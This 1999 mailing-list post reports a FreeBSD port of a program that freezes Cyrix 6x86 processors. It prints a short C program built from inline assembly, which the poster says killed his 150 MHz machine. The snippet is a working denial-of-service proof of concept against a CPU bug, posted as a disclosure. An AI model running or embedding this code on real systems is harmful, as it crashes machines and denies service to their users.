Cyrix crash - FreeBSD

From: Patrick Oonk (patrickat_private)
Date: Tue Feb 09 1999 - 04:14:24 PST

    Ragnar Hojland Espinosa [ragnarat_private] mailed me a
    modified version of the freeze program that runs on FreeBSD:

    int main()
    {
       asm ("foo:");
       asm ("cwtl");
       asm ("orl $0xe6ebe020,%eax");
       asm ("jle foo");
       asm ("addb %al,(%eax)");

       return 0;
    }

    I compiled and ran it, the machine was dead.

    CPU: Cyrix 6x86 (486-class CPU)
      Origin = "CyrixInstead"  DIR=0x2231  Stepping=2  Revision=2

    Running at 150 mhz.

    	Patrick

    --
    While preceding your entrance with a grenade
    is a good tactic in Quake, it can lead to problems